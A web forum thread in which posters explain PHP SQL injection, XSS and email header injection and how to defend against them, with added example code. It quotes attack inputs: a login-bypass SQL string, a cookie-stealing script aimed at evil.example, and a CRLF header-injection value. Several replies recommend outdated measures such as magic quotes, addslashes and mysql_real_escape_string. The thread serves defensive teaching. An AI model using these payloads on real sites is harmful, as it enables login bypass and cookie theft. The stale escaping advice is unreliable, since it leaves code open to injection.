Hello, I read in an article that someone can do an injection into a PHP script; it says that it can be done by inserting a script via the URL (GET method) and via a field from a form (POST method). My questions are: 1. What should I do to avoid PHP injection via GET and POST fields? 2. What shouldn't I do in any script that could open a hole for an injection? 3. Is htmlspecialchars important to avoid PHP injection? Thanks
http://www.acunetix.com/websitesecurity/sql-injection.htm http://unixwiz.net/techtips/sql-injection.html http://www.google.com/search?q=php+sql+injection
I think a simpler way to get rid of SQL injections is to use mysql_escape_string() in your SQL queries.
Or, preferably, mysql_real_escape_string(). mysql_escape_string() is deprecated, and should no longer be used.
It basically comes down to this: Do NOT trust user-provided data. There are three big concerns: SQL injection, XSS, and "email injection" (not sure if there's a specific term). SQL injection is when someone is able to run SQL commands on your database because you did not filter his/her input. XSS is when someone is able to alter the display of your page because you did not filter HTML/CSS/JavaScript from the input. Email injection is when someone is able to alter the usage of your email script in order to send out spam. Each of these is stopped in a different way, but the main theme is the same: filter user input.

SQL

Example query: SELECT * FROM users WHERE name='$name' AND password='$password';

If your PHP script just dumps user input, someone could put admin for name and ' OR 1='1 for password. This makes the query:

SELECT * FROM users WHERE name='admin' AND password='' OR 1='1';

One is always equal to one, so it only has to match the username.

XSS

Never echo/print POST or GET variables directly. One of the big ways this is used is to transfer cookie data using JavaScript, but it can also be used to alter your HTML so that a form is submitted elsewhere (e.g., a login form).

Email

The top of an email might look something like this:

From: "User" <whattheyput@example.com>
To: <intended >

If you don't filter their input, they could put a newline/carriage return at the end of the From line and then add their own "To: blah" line.

Hopefully these overly simple examples explain the basic concepts.

1. Always filter user input.
2. Never trust user input.
3. That can be used against XSS, but is not always the desired method.
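The login query from the answer above, run both ways against a throwaway database. This is an added example, not code from the thread: it assumes the pdo_sqlite extension is available, and the users table and its two rows are constructed inline. It goes one step beyond the answer by showing the fix as well as the hole: a prepared statement with bound parameters keeps the SQL text fixed, so the attacker's quote can no longer change the query's structure. The payload is written as ' OR '1'='1 rather than ' OR 1='1 because SQLite compares the literals 1 and '1' as different types and would not treat them as equal; the effect on the string-built query is the same.

```php
<?php
// Added example (not from the thread). Assumes the pdo_sqlite extension.
declare(strict_types=1);

function makeDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (name TEXT, password TEXT)');
    // Constructed rows. Plaintext passwords only to keep the demo short;
    // real code stores password_hash() output and checks with password_verify().
    $db->exec("INSERT INTO users VALUES ('admin', 'correct horse'), ('alice', 'hunter2')");
    return $db;
}

// Vulnerable: user input is pasted straight into the SQL text, exactly as in
// the answer's example query.
function loginVulnerable(PDO $db, string $name, string $password): ?string
{
    $sql = "SELECT name FROM users WHERE name='$name' AND password='$password'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row['name'] ?? null;
}

// Hardened: the SQL text is a constant; the values travel separately as bound
// parameters, so a quote inside them is just part of the value.
function loginSafe(PDO $db, string $name, string $password): ?string
{
    $stmt = $db->prepare('SELECT name FROM users WHERE name = :name AND password = :password');
    $stmt->execute([':name' => $name, ':password' => $password]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row['name'] ?? null;
}

$db = makeDb();
$payload = "' OR '1'='1";   // submitted as the password field

// The string-built query becomes ... AND password='' OR '1'='1', which matches every row.
var_dump(loginVulnerable($db, 'admin', $payload));

// The prepared statement looks for a user whose password literally is the payload.
var_dump(loginSafe($db, 'admin', $payload));

// The legitimate login still works through the prepared statement.
var_dump(loginSafe($db, 'admin', 'correct horse'));
```

Run it with php on the command line: the first var_dump shows the admin row being returned without the password, the second returns null because the payload is simply a wrong password, and the third shows that the real credentials still work. Escaping functions such as mysql_real_escape_string() only patch the string-building approach; binding parameters removes the problem.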
In general, for all information that has been supplied by the user and that I print out to the browser, I use htmlspecialchars on it. If they have tried to insert script tags or whatnot, you will simply read the script tags they have entered, and they will not function to perform the script they are trying to execute. This will protect against XSS attacks. If you want to get incredibly secure, you can use regular expressions to strip certain characters from their input, but I can't help with that.

As far as protecting against SQL injection, it is a little tougher. First, you need to know whether magic quotes is enabled or not. You can use the get_magic_quotes_gpc() function for that. If it is, magic quotes will add slashes to data. If it isn't, you will want to use addslashes before it enters the database. Magic quotes, I believe, will also affect $_GET values. So you will want to strip or add slashes as needed. I also suggest using mysql_real_escape_string on data, as mentioned above.

Now, as far as using $_GET (e.g., getting values that are passed in the URL and using them in queries), you will want to really take care of those. Never trust data sent by a user, or data that can even be altered by a user; this goes for ALL form values, even hidden ones.

A good rule of thumb is to escape all user-supplied output with htmlspecialchars and protect all data sent to the database with mysql_real_escape_string. Search the php.net manual for most of these terms above and you will get a better understanding of them.
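The two non-SQL cases raised in this thread, output escaping for XSS and the newline trick in email headers, in one added example that is not code from any of the posters. The helper names (e, renderGreeting, cleanHeaderValue, buildHeaders) and the sample inputs are assumptions made up for the illustration. It adds two points the posts do not spell out: htmlspecialchars should be called with ENT_QUOTES and an explicit charset so that attribute values and multibyte input are covered, and a header value must be rejected, not just quoted, when it contains a carriage return or line feed.

```php
<?php
// Added example (not the poster's code). Helper names are illustrative.
declare(strict_types=1);

// HTML context: escape at the point of output. ENT_QUOTES also converts the
// single quote, so the same helper is safe inside attribute values; the
// explicit charset keeps multibyte input from being mis-decoded.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderGreeting(string $name): string
{
    return '<p>Hello, ' . e($name) . '</p>'
         . '<input type="text" name="name" value="' . e($name) . '">';
}

// Email header context: one header is one line. A CR or LF inside a value
// would let the submitter start a line of their own (e.g. an extra To: or Bcc:),
// so the value is refused outright rather than "cleaned".
function cleanHeaderValue(string $value): string
{
    if (preg_match('/[\r\n]/', $value)) {
        throw new InvalidArgumentException('header value contains a line break');
    }
    return $value;
}

function buildHeaders(string $fromName, string $fromAddr): string
{
    // FILTER_VALIDATE_EMAIL rejects addresses containing line breaks or spaces.
    if (filter_var($fromAddr, FILTER_VALIDATE_EMAIL) === false) {
        throw new InvalidArgumentException('invalid From address');
    }
    $name = str_replace('"', '', cleanHeaderValue($fromName));
    return 'From: "' . $name . '" <' . $fromAddr . ">\r\n";
}

// Constructed attacker inputs.
$xss = '<script>document.location="http://evil.example/?c="+document.cookie</script>';
echo renderGreeting($xss), PHP_EOL;

try {
    echo buildHeaders("User\r\nTo: victim@example.net", 'whattheyput@example.com');
} catch (InvalidArgumentException $ex) {
    echo 'rejected: ', $ex->getMessage(), PHP_EOL;
}

echo buildHeaders('User', 'whattheyput@example.com');
```

The rendered greeting contains the script tag as visible text, with the angle brackets and quotes converted to entities, so the browser shows it rather than running it. The first buildHeaders call is rejected because the display name carries a CRLF followed by a second To: line; the second call produces a single well-formed From: header. Escaping is done where the data is used (HTML output, header line), not where it arrives, because the right escaping depends on the destination.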
The easiest way to avoid PHP injection is implementing this small snippet into your index page, http://codr.us/category/PHP/Avoid-URL-injection
A great way to avoid XSS is, if you echo/print variables, to wrap them in htmlspecialchars(). If code was injected, such as <script>, it will print just like that and not run as code. Very handy.
Use mysql_real_escape_string() in the query, like this: mysql_real_escape_string($email), mysql_real_escape_string($comment));